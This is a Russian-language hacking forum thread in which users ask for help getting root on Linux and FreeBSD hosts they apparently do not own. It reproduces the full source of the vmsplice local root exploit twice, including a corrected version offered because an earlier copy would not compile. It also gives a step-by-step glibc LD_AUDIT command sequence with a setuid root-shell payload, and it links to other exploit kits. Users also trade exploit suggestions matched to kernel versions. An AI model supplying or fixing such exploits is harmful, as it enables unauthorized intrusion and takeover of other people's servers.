повышение прав [задай вопрос - получи ответ]

Discussion in 'Уязвимости' started by Konqi, 15 Oct 2010.

Thread Status:
Not open for further replies.
  1. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    Для ядер 2.6.х даты сборки до июля 2009 идеально подходит сборка enlightenment:
    http://www.grsecurity.net/~spender/enlightenment.tgz
     
    _________________________
  2. edge911

    edge911 Active Member

    Joined:
    21 Feb 2009
    Messages:
    105
    Likes Received:
    142
    Reputations:
    15
    мм? :rolleyes:
     
  3. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    2.6.18 exploit

    может кто подскажет почему ощибку дает:
    2 сплоита
    один на паблик выложен но умышленно не доделан:
    Code:
    /*
     
    /*
    * jessica_biel_naked_in_my_bed.c
    *
    * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
    * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
    * Stejnak je to stare jak cyp a aj jakesyk rozbite.
    *
    * Linux vmsplice Local Root Exploit
    * By qaaz
    *
    * Linux 2.6.18 - 2011
    *
    * This is quite old code and I had to rewrite it to even compile.
    * It should work well, but I don't remeber original intent of all
    * the code, so I'm not 100% sure about it. You've been warned ;)
    *
    * -static -Wno-format
    */
    #define _GNU_SOURCE
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #include
    #define __KERNEL__
    #include 
     
    #define PIPE_BUFFERS 16
    #define PG_compound 14
    #define uint unsigned int
    #define static_inline static inline __attribute__((always_inline))
    #define STACK(x) (x + sizeof(x) - 40)
     
    struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
    };
     
    void exit_code();
    char exit_stack[1024 * 1024];
     
    void die(char *msg, int err)
    {
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
    }
     
    #if defined (__i386__)
     
    #ifndef __NR_vmsplice
    #define __NR_vmsplice 316
    #endif
     
    #define USER_CS 0x73
    #define USER_SS 0x7b
    #define USER_FL 0x246
     
    static_inline
    void exit_kernel()
    {
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
    );
    }
     
    static_inline
    void * get_current()
    {
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
    }
     
    #elif defined (__x86_64__)
     
    #ifndef __NR_vmsplice
    #define __NR_vmsplice 278
    #endif
     
    #define USER_CS 0x23
    #define USER_SS 0x2b
    #define USER_FL 0x246
     
    static_inline
    void exit_kernel()
    {
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
    );
    }
     
    static_inline
    void * get_current()
    {
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
    }
     
    #else
    #error "unsupported arch"
    #endif
     
    #if defined (_syscall4)
    #define __NR__vmsplice __NR_vmsplice
    _syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)
     
    #else
    #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
    #endif
     
    static uint uid, gid;
     
    void kernel_code()
    {
    int i;
    uint *p = get_current();
     
    for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
    pages[0]->count = 1;
    pages[1]->lru.next = (long) kernel_code;
     
    /*****/
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;
     
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
    die("mmap", errno);
     
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[2]);
    printf("[+] page: 0x%lx\n", pages[3]);
     
    pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
    pages[2]->count = 1;
    pages[3]->lru.next = (long) kernel_code;
     
    /*****/
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
    die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[4]);
     
    /*****/
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
    die("mmap", errno);
     
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
     
    /*****/
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
    die("munmap", errno);
     
    /*****/
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);
     
    iov.iov_base = map_addr;
    iov.iov_len = ULONG_MAX;
     
    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
    }
    второй нашел вроде как приват но на 2.6.18...х не катит,ошибку постоянно выдает.(на разных хостах пробовал: )
    /*
    * jessica_biel_naked_in_my_bed.c
    *
    * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
    * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
    * Stejnak je to stare jak cyp a aj jakesyk rozbite.
    *
    * Linux vmsplice Local Root Exploit
    * By qaaz
    *
    * Linux 2.6.17 - 2.6.24.1
    *
    * This is quite old code and I had to rewrite it to even compile.
    * It should work well, but I don't remeber original intent of all
    * the code, so I'm not 100% sure about it. You've been warned ;)
    *
    * -static -Wno-format
    */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <malloc.h>
    #include <limits.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/uio.h>
    #include <sys/mman.h>
    #include <asm/page.h>
    #define __KERNEL__
    #include <asm/unistd.h>

    #define PIPE_BUFFERS 16
    #define PG_compound 14
    #define uint unsigned int
    #define static_inline static inline __attribute__((always_inline))
    #define STACK(x) (x + sizeof(x) - 40)

    struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
    };

    void exit_code();
    char exit_stack[1024 * 1024];

    void die(char *msg, int err)
    {
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
    }

    #if defined (__i386__)

    #ifndef __NR_vmsplice
    #define __NR_vmsplice 316
    #endif

    #define USER_CS 0x73
    #define USER_SS 0x7b
    #define USER_FL 0x246

    static_inline
    void exit_kernel()
    {
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
    );
    }

    static_inline
    void * get_current()
    {
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
    }

    #elif defined (__x86_64__)

    #ifndef __NR_vmsplice
    #define __NR_vmsplice 278
    #endif

    #define USER_CS 0x23
    #define USER_SS 0x2b
    #define USER_FL 0x246

    static_inline
    void exit_kernel()
    {
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
    );
    }

    static_inline
    void * get_current()
    {
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
    }

    #else
    #error "unsupported arch"
    #endif
     
  4. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    vasykas, вот исправленный код первого сплойта с твоего сообщения:

    Code:
    /*
    * jessica_biel_naked_in_my_bed.c
    *
    * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
    * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
    * Stejnak je to stare jak cyp a aj jakesyk rozbite.
    *
    * Linux vmsplice Local Root Exploit
    * By qaaz
    *
    * Linux 2.6.18 - 2011
    *
    * This is quite old code and I had to rewrite it to even compile.
    * It should work well, but I don't remeber original intent of all
    * the code, so I'm not 100% sure about it. You've been warned ;)
    *
    * -static -Wno-format
    */
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <malloc.h>
    #include <limits.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/uio.h>
    #include <sys/mman.h>
    //#include <asm/page.h>
    #define PAGE_SIZE getpagesize()
    #define __KERNEL__
    #include <asm/unistd.h>
    
     
    #define PIPE_BUFFERS 16
    #define PG_compound 14
    #define uint unsigned int
    #define static_inline static inline __attribute__((always_inline))
    #define STACK(x) (x + sizeof(x) - 40)
     
    struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
    };
     
    void exit_code();
    char exit_stack[1024 * 1024];
     
    void die(char *msg, int err)
    {
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
    }
     
    #if defined (__i386__)
     
    #ifndef __NR_vmsplice
    #define __NR_vmsplice 316
    #endif
     
    #define USER_CS 0x73
    #define USER_SS 0x7b
    #define USER_FL 0x246
     
    static_inline
    void exit_kernel()
    {
    __asm__ __volatile__ (
    "movl %0, 0x10(%%esp) ;"
    "movl %1, 0x0c(%%esp) ;"
    "movl %2, 0x08(%%esp) ;"
    "movl %3, 0x04(%%esp) ;"
    "movl %4, 0x00(%%esp) ;"
    "iret"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
    );
    }
     
    static_inline
    void * get_current()
    {
    unsigned long curr;
    __asm__ __volatile__ (
    "movl %%esp, %%eax ;"
    "andl %1, %%eax ;"
    "movl (%%eax), %0"
    : "=r" (curr)
    : "i" (~8191)
    );
    return (void *) curr;
    }
     
    #elif defined (__x86_64__)
     
    #ifndef __NR_vmsplice
    #define __NR_vmsplice 278
    #endif
     
    #define USER_CS 0x23
    #define USER_SS 0x2b
    #define USER_FL 0x246
     
    static_inline
    void exit_kernel()
    {
    __asm__ __volatile__ (
    "swapgs ;"
    "movq %0, 0x20(%%rsp) ;"
    "movq %1, 0x18(%%rsp) ;"
    "movq %2, 0x10(%%rsp) ;"
    "movq %3, 0x08(%%rsp) ;"
    "movq %4, 0x00(%%rsp) ;"
    "iretq"
    : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
    "i" (USER_CS), "r" (exit_code)
    );
    }
     
    static_inline
    void * get_current()
    {
    unsigned long curr;
    __asm__ __volatile__ (
    "movq %%gs:(0), %0"
    : "=r" (curr)
    );
    return (void *) curr;
    }
     
    #else
    #error "unsupported arch"
    #endif
     
    #if defined (_syscall4)
    #define __NR__vmsplice __NR_vmsplice
    _syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)
     
    #else
    #define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
    #endif
     
    static uint uid, gid;
     
    void kernel_code()
    {
    int i;
    uint *p = get_current();
     
    for (i = 0; i < 1024-13; i++) { if (p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid && p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid) { p[0] = p[1] = 
    p[2] = p[3] = 0; p[4] = p[5] = p[6] = p[7] = 0; p = (uint *) ((char *)(p + 8) + sizeof(void *)); p[0] = p[1] = p[2] = ~0; break; } p++; } exit_kernel(); } void exit_code() 
    { if (getuid() != 0) die("wtf", 0); printf("[+] root\n"); putenv("HISTFILE=/dev/null"); execl("/bin/bash", "bash", "-i", NULL); die("/bin/bash", errno); } int main(int 
    argc, char *argv[]) { int pi[2]; size_t map_size; char * map_addr; struct iovec iov; struct page * pages[5]; uid = getuid(); gid = getgid(); setresuid(uid, uid, uid); 
    setresgid(gid, gid, gid); printf("-----------------------------------\n"); printf(" Linux vmsplice Local Root Exploit\n"); printf(" By qaaz\n"); 
    printf("-----------------------------------\n"); if (!uid || !gid) die("!@#$", 0); /*****/ pages[0] = *(void **) &(int[2]){0,PAGE_SIZE}; pages[1] = pages[0] + 1; map_size = 
    PAGE_SIZE; map_addr = mmap(pages[0], map_size, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if (map_addr == MAP_FAILED) die("mmap", errno); 
    memset(map_addr, 0, map_size); printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size); printf("[+] page: 0x%lx\n", pages[0]); printf("[+] page: 0x%lx\n", 
    pages[1]); pages[0]->flags = 1 << PG_compound; pages[0]->private = (unsigned long) pages[0];
    pages[0]->count = 1;
    pages[1]->lru.next = (long) kernel_code;
     
    /*****/
    pages[2] = *(void **) pages[0];
    pages[3] = pages[2] + 1;
     
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[2], map_size, PROT_READ | PROT_WRITE,
    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
    die("mmap", errno);
     
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[2]);
    printf("[+] page: 0x%lx\n", pages[3]);
     
    pages[2]->flags = 1 << PG_compound; pages[2]->private = (unsigned long) pages[2];
    pages[2]->count = 1;
    pages[3]->lru.next = (long) kernel_code;
     
    /*****/
    pages[4] = *(void **) &(int[2]){PAGE_SIZE,0};
    map_size = PAGE_SIZE;
    map_addr = mmap(pages[4], map_size, PROT_READ | PROT_WRITE,
    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
    die("mmap", errno);
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
    printf("[+] page: 0x%lx\n", pages[4]);
     
    /*****/
    map_size = (PIPE_BUFFERS * 3 + 2) * PAGE_SIZE;
    map_addr = mmap(NULL, map_size, PROT_READ | PROT_WRITE,
    MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (map_addr == MAP_FAILED)
    die("mmap", errno);
     
    memset(map_addr, 0, map_size);
    printf("[+] mmap: 0x%lx .. 0x%lx\n", map_addr, map_addr + map_size);
     
    /*****/
    map_size -= 2 * PAGE_SIZE;
    if (munmap(map_addr + map_size, PAGE_SIZE) < 0)
    die("munmap", errno);
     
    /*****/
    if (pipe(pi) < 0) die("pipe", errno);
    close(pi[0]);
     
    iov.iov_base = map_addr;
    iov.iov_len = ULONG_MAX;
     
    signal(SIGPIPE, exit_code);
    _vmsplice(pi[1], &iov, 1, 0);
    die("vmsplice", errno);
    return 0;
    }
    
    
     
    1 person likes this.
  5. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    скомпилился но не помогло
     
  6. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    ты просил помочь с ошибками...ты же не думал, что рабочий приватный сплойт будет выложен в паблик с такой смешной недоработкой
     
  7. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    будьте так любезны, подберите сплоит под

    OS version: Linux version 2.6.32-3-amd64 (Debian 2.6.32-9) ([email protected]) (gcc version 4.3.4 (Debian 4.3.4-8) ) #1 SMP Wed Feb 24 18:07:42 UTC 2010
    Distr name: Debian GNU/Linux 6.0

    пробовал _1337day.com/exploits/14601
    но не разобрался как с ним работать

    пробовал r00t.sh (не запустился)
    пробовал через libpcprofile.so нет прав на запись..
     
    #387 C-r-A-c-K, 20 Jul 2011
    Last edited: 20 Jul 2011
  8. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Судя по вашему сообщению через libpcprofile.so вы пробовали сделать выполнение крон...но данный дистрибутив должен пробиваться стандартным способом баги Glib...
    вот перечень команд:
    Code:
    $ mkdir /tmp/exploit
    
    $ ln /bin/ping /tmp/exploit/target
    
    $ exec 3< /tmp/exploit/target
    
    $ rm -rf /tmp/exploit/
    
    $ cat > payload.c
    void __attribute__((constructor)) init()
    {
    setuid(0);
    system("/bin/bash");
    }
    ^D
    
    $ gcc -w -fPIC -shared -o /tmp/exploit payload.c
    
    $ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
    
    
     
  9. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    к сожалению такой метод не прошел.
    запрещены хард-линки
    ОС установленна в отдельный сектор, где не нашел ни единой папки с правами на запись.

    посмотрите что-нибудь еще пожалуйста.
     
  10. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    ну прав на запись там и не должно нигде быть..в том методе, права на запись нужны только в папке tmp...а там они всегда есть...
    пройбуй роберт ю сак, фулл нельсон.
     
    1 person likes this.
  11. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    это не поможет?
    http://turboupload.com/n0f9pp2a1udn
     
    1 person likes this.
  12. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    vasykas, спасибо
    помог сплоит ia32syscall emulation
     
  13. exmicru

    exmicru New Member

    Joined:
    16 May 2011
    Messages:
    8
    Likes Received:
    1
    Reputations:
    1
    Code:
    Linux ****** 2.6.32.38-bitrix10 #1 SMP Fri Apr 22 04:08:18 MSD 2011 x86_64
    Подскажите сплойт.
     
  14. C-r-A-c-K

    C-r-A-c-K New Member

    Joined:
    28 May 2011
    Messages:
    18
    Likes Received:
    2
    Reputations:
    1
    exmicru, имхо не найдешь, слишком свежий.

    Уважаемые постояльцы, подскажите что-нибудь для
    Linux version 2.6.27.5-117.fc10.x86_64 ([email protected]) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Tue Nov 18 11:58:53 EST 2008

    p.s. при компилировании чего-либо ругается на инклуды /usr/include/string.h:39: error: expected declaration specifiers or '...' before 'size_t' и т.д.
    может кто подскажет возможно рабочий вариант, тогда буду эксперементировать уже с библиотеками.
     
  15. sevenup

    sevenup Member

    Joined:
    4 Oct 2009
    Messages:
    100
    Likes Received:
    17
    Reputations:
    7
    Enlightenment, Glib
     
  16. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Подскажите, что можно тут попробовать?

    FreeBSD ****** 6.1-RELEASE FreeBSD 6.1-RELEASE #0: Thu Oct 26 14:44:23 PDT 2006
     
  17. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    http://www.securitylab.ru/poc/275399.php
    http://www.exploit-db.com/exploits/9488/
    http://security-sh3ll.blogspot.com/2009/08/freebsd-61-local-root-vulnerability.html
    http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
    че нибудь здесь посмотри
     
  18. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    Не один из них так и не скомпилился.. Ошибки валятся.. Могу привести их сюда, если необходимо..
     
  19. vasykas

    vasykas Banned

    Joined:
    7 Mar 2011
    Messages:
    963
    Likes Received:
    137
    Reputations:
    37
    давай
     
  20. ne0k

    ne0k New Member

    Joined:
    3 Mar 2011
    Messages:
    51
    Likes Received:
    1
    Reputations:
    0
    http://forum.intern0t.net/exploits-vulnerabilities-pocs/1302-freebsd-6-1-local-root-vulnerability-0-day.html
    ###########################
    1.c: In function `main':
    1.c:73: warning: assignment from incompatible pointer type
    1.c:83: warning: passing arg 3 of `pthread_create' from incompatible pointer type
    1.c:84: warning: passing arg 3 of `pthread_create' from incompatible pointer type
    1.c:107:2: warning: no newline at end of file
    /var/tmp//ccvijMZ6.o(.text+0x1ee): In function `main':
    : undefined reference to `pthread_create'
    /var/tmp//ccvijMZ6.o(.text+0x203): In function `main':
    : undefined reference to `pthread_create'
    ###########################

    http://www.exploit-db.com/exploits/9488/
    ############################
    /var/tmp//ccOFVRly.o(.text+0x1dd): In function `main':
    : undefined reference to `pthread_create'
    /var/tmp//ccOFVRly.o(.text+0x1f2): In function `main':
    : undefined reference to `pthread_create'
    ############################

    По одному из линков вообще ДоС..

    з.ы. Не ругаться, я в Си подобных языках вообще ноль.
     
Thread Status:
Not open for further replies.